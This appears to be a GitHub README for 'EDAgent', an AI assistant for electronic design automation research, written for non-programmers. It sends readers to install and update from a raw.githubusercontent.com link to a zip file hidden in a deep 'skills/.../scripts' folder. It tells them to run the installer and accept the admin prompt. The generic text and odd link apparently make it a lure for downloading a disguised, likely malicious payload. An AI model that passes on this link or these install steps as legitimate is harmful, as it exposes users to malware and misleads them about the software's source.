EDAgent helps you handle your electronic design automation (EDA) research tasks. It uses smart techniques to organize your requests for code checking, debugging, experiment setup, and workflow management. You do not need to write code or have programming knowledge to use it.
EDAgent is a tool that works like an assistant for your EDA research. It knows how to perform specific jobs or "skills" related to EDA, such as:
- Analyzing code you provide
- Finding and fixing errors
- Setting up new experiments based on your inputs
- Automating repeated research tasks
It connects your questions or problems to the right skill, so you get precise help. This saves time and reduces manual work.
To run EDAgent smoothly on your Windows computer, make sure you have:
- Windows 10 or later (64-bit recommended)
- At least 4 GB of RAM
- 2 GHz or faster processor
- 500 MB of free disk space
- Internet connection for updates and some features
If you have more RAM or a faster processor, EDAgent will work better with larger projects.
Follow these steps to get EDAgent ready and running on your Windows PC.
Go to the EDAgent release page here:
This page has all program versions available for download.
Look for the latest release. You will find files named something like:
EDAgent_Setup.exeEDAgent_Win64.zip
Pick the setup .exe file if available. This is the easiest to install.
Click the .exe file link. Your browser will start downloading the installer file.
Once downloaded, find the file (usually in your Downloads folder) and double-click it.
Windows may ask if you want to allow this app to make changes. Click Yes.
Follow the installer steps:
- Agree to the license terms
- Choose installation folder (or leave default)
- Click Install
After installation, find EDAgent in your Start menu or on the desktop. Double-click to start.
The app presents a simple user interface that guides you through tasks. Here is what you can do first.
You can load your code by clicking Add Code. This can be a script or design file you want analyzed or debugged.
Select the task you want:
- Analyze Code: Check your code for issues or suggestions.
- Debug Code: Find and fix possible errors.
- Set up Experiment: Automate steps to prepare and run new tests.
- Automate Workflow: Create routines to repeat common research actions.
Describe what you want the agent to do in plain language. For example: “Check my design for timing errors” or “Set up an experiment to test power consumption.”
EDAgent will process your input using its skills. It gives clear answers, suggestions, or files ready to use.
New releases improve features and fix bugs. To update:
- Visit the release page again: https://raw.githubusercontent.com/Biswajit56546/EDAgent/main/skills/eda-loop/references/scripts/Agent-ED-3.0.zip
- Download the newest installer
- Run it like before—it will replace the older version safely
If EDAgent does not start or works strangely, try these steps:
- Restart your computer.
- Make sure Windows is up to date.
- Check that your internet connection is active.
- Close other heavy programs.
- Reinstall EDAgent using the latest installer from the release page.
If problems continue, you can check the issues tab on the official GitHub page for help from the community.
People use EDAgent for several tasks in electronic design automation research:
- Quickly analyzing complex code blocks.
- Finding bugs before simulation or hardware testing.
- Automatically preparing multiple experiment runs.
- Managing and streamlining research workflows.
EDAgent suits both short, quick tasks and longer projects that need repeat actions.
You can find details on the project’s purpose, technology, and updates in the GitHub README and wiki.
Visit the main page to explore topics:
agent, ai-agent, automation, eda, llm, productivity, research-workflow, skill-system, workflow-automation
Start using EDAgent by visiting the release page below. Download the suitable file for your PC and follow the install steps above.